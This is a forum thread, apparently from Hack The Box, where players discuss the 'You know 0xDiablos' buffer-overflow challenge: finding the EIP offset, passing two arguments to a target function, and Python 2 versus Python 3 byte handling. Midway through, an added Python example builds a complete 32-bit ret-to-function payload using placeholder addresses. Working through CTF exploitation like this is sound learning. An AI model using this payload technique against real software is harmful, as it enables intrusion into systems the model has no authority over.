[pwn] You know 0xDiablos

Got the flag :). Could anyone get this exploit to work in Python 3? I managed to do it with Python 2 in the end, but would’ve liked to do it in Python 3…

I’ve never done a BOF before and I'm trying to read through assembly documentation, but I think I have the right idea. I've made a payload to send and have the address I need, but I still get a fault error when sending it.

If someone could PM me a hint or something that would be great. I also don't know where to put variables.

@Oscuridad said:

I’ve never done a BOF before and I'm trying to read through assembly documentation, but I think I have the right idea. I've made a payload to send and have the address I need, but I still get a fault error when sending it.

If someone could PM me a hint or something that would be great. I also don't know where to put variables.

Send me the exploit on discord “Alex Zander#0764”

I’m confused, I’m testing a BOF, and successfully overwriting EIP in a VM, but doing the same on a physical box doesn’t work?

ASLR is off on both…

Same-length payload of 'A's, then 4 * 'B', and 4 * 'C'.

On the VM: EIP gets 'BBBB', with ESP at 'CCCC'.
On the physical box: EIP gets 'AAAA', with ESP at 'BBBBCCCC'?

Environments were NOT the same! Lesson learned. Problem solved.

I am really confused. In a Kali VM, using gdb/gef/pwntools, after many hours I finally got a successful exploit.py (from the gef skeleton) working. But only locally. Remotely I get the 'A's string echoed back. Playing with the length of those 'A's I will get the same thing back, or nothing, or connection refused for several minutes.

I do not understand why it would work in VM but not remotely. I cannot imagine that remotely it is not running in a VM or Docker container…

@Baseizo7 said:

I am really confused. In a Kali VM, using gdb/gef/pwntools, after many hours I finally got a successful exploit.py (from the gef skeleton) working. But only locally. Remotely I get the 'A's string echoed back. Playing with the length of those 'A's I will get the same thing back, or nothing, or connection refused for several minutes.

I do not understand why it would work in VM but not remotely. I cannot imagine that remotely it is not running in a VM or Docker container…

Never mind! Figured it out. h4x0r error. Apparently I have trouble noticing glaring numerical typos right in front of me for hours.

Hi,
can anybody give me any help, please?
I have a payload without bad characters and have gone through it in gdb+peda, but I can't make it work even locally.
I redirect EIP to the method with both parameters but still no success.
Thanks.

That was my first buffer overflow and while it may be simple in the realm of BOFs, I found it very difficult. Great challenge though and I’ve learned a lot. For other noobs, IppSec’s Safe video is a good place to get a feel for buffer overflows as he explains the tools you can use; however, the BOF in that video is much more complex than this one. LiveOverflow has a Binary Exploitation playlist on YouTube, which is where I gained most of my knowledge for reading assembly and making sense of the output I was seeing in Ghidra. He also uses GDB, which is a fantastic tool for exploring what’s going on in the binary when it’s running.

My advice for anyone struggling in this challenge or new to BOF is to

  1. Find what you’re looking for in Ghidra
  2. Learn to use GDB
  3. Set some breakpoints in the code
  4. Learn how to read from the memory locations and step through piece by piece.

Not only can it show you what the binary is doing - it shows you what your exploit is doing. In some cases your exploit could just be a few addresses away from working, that’s what happened to me anyway.

I haven’t seen many people plug YT content before, so apologies if this is a spoiler or against the rules.

Just solved it, my first bof without any walkthrough! :smiley:
As mentioned earlier in the thread: use python2!
I had the correct payload at one point but it didn’t work with python3 so i wasted a few hours trying other stuff.
Happy to help if anyone needs a nudge.

I just solved this. I saw a mention to use Python 2 vs. Python 3, but I got my exploit to work in Python3. I only had one line I had to change to make it successfully run in Python 3.

When I try to overwrite EIP it's substituting the address I want to point to with other random cr*p.

I’ve just finished the BOF module on HTB Academy, but what I’ve learned there doesn’t seem to apply, or I’m doing something horribly wrong.

Hi, I’m super new here… I’ve tried this challenge, I can BOF the 1st function… I saw I need to add params for the 2nd one… I think I sent them (as I can see their values in the registers) but I can’t make it print the answer. I don’t have other ideas, maybe I’m missing something… Could anybody give me a hint?

This challenge is really good, I really like it. Especially: don't go too fast, you risk missing important stages.

How can I pass the 2 arguments?

@ajnik said:

How can I pass the 2 arguments?

nevermind, got it :slight_smile:

@sebssekk said:

Hi, I’m super new here… I’ve tried this challenge, I can BOF the 1st function… I saw I need to add params for the 2nd one… I think I sent them (as I can see their values in the registers) but I can’t make it print the answer. I don’t have other ideas, maybe I’m missing something… Could anybody give me a hint?

You can see registers with the “info registers” command in gdb or with the “dr” command in radare2.
If you add a breakpoint and debug, then you can see which addresses the “CMP” operations will look at. If you know how far you must overwrite to reach those addresses, then you’ve done it.
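Added example, written for this edit and not taken from any post in the thread or from the challenge itself: it shows the two things people above kept tripping over, the stack layout needed to return into a function and hand it two arguments on 32-bit x86 (the question @sebssekk and @ajnik asked), and the single Python 3 difference (bytes versus str) that several posters hit. Every number in it (function address, the two compared constants, the offset to the saved EIP) is a placeholder; the real values come from your own Ghidra/gdb/radare2 session.

```python
import struct
import sys

# Hypothetical values, NOT the challenge's real ones: read the function
# address, the two constants the CMPs check, and the buffer-to-saved-EIP
# distance from your own disassembly and debugger.
TARGET_FUNC = 0x08049000   # function you want RET to land in
ARG1 = 0xDEADBEEF          # value its first argument is compared against
ARG2 = 0xC0DED00D          # value its second argument is compared against
OFFSET = 188               # bytes from buffer start to the saved EIP slot


def p32(value):
    """Pack an int as 4 little-endian bytes (what pwntools' p32 does)."""
    return struct.pack("<I", value & 0xFFFFFFFF)


def build_payload(offset, target, arg1, arg2, fake_ret=0x41414141):
    """Frame for reaching a 32-bit cdecl function through a corrupted RET.

    When the vulnerable function executes RET, ESP moves just past the slot
    that held the saved EIP, so the function we land in sees:
      [esp]    fake_ret   its own return address (only used when it returns)
      [esp+4]  arg1       first argument
      [esp+8]  arg2       second argument
    """
    payload = b"A" * offset        # bytes literal: this is the Python 3 change
    payload += p32(target)         # overwrites saved EIP
    payload += p32(fake_ret)       # what 'target' believes it should return to
    payload += p32(arg1)
    payload += p32(arg2)
    return payload


def frame_view(payload, offset):
    """The four words at the overwrite point, as the callee will read them.

    Compare this against 'x/4wx $esp' at a breakpoint on the target function
    (or 'info registers' / radare2's 'dr') to confirm the layout matches.
    """
    return struct.unpack("<4I", payload[offset:offset + 16])


def python3_str_pitfall(addr):
    """The usual way a Python 2 script breaks under Python 3.

    Building the address as a str (e.g. '\\x00\\x90\\x04\\x08') and encoding it
    turns every byte >= 0x80 into a two-byte UTF-8 sequence, so the frame
    shifts and EIP receives 'random' bytes instead of the intended address.
    In Python 2 that same literal is already raw bytes, which is why the
    identical script works there.
    """
    as_str = "".join(chr((addr >> (8 * i)) & 0xFF) for i in range(4))
    return as_str.encode("utf-8")   # len() != 4 whenever any byte >= 0x80


if __name__ == "__main__":
    # Emit raw bytes; print() on a bytes object would write the repr b'...'.
    sys.stdout.buffer.write(build_payload(OFFSET, TARGET_FUNC, ARG1, ARG2))
```

Pipe the script's output into the binary (locally or over the network with nc) rather than printing it, and verify the layout first with a breakpoint on the target function: if `frame_view` disagrees with what the debugger shows at ESP, the offset is wrong, not the arguments.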

This was an awesome challenge! I am a n00b to binary exploitation, and decided to try popping a shell after getting the flag - which I just did!

It took a lot of effort, but I learned a lot in the process. This challenge was a great learning experience, and I would recommend it to anyone looking to get into reversing or binary exploitation.

Can someone give me a little nudge? I have it pointing to the correct function and I believe I can set the params, but I am struggling to figure out what they need to be.

@keZy said:

Can someone give me a little nudge? I have it pointing to the correct function and I believe I can set the params, but I am struggling to figure out what they need to be.

I’m not sure which disassemblers and debuggers you are using, but I find radare2’s visual graph mode very helpful for analyzing control flow. You can get into visual graph mode with the ‘VV’ command (that is two V’s). From there, you can look around a function’s basic blocks with vi-like controls (‘h/j/k/l’) or the arrow keys. If you want to exit visual graph mode, you need to type ‘q’ twice: once to exit the mode, and then to exit the hex editor (TBH, I’m not sure why this is).

Assuming you are also using radare as a debugger, you can use it to verify what you think is happening, versus what is actually happening.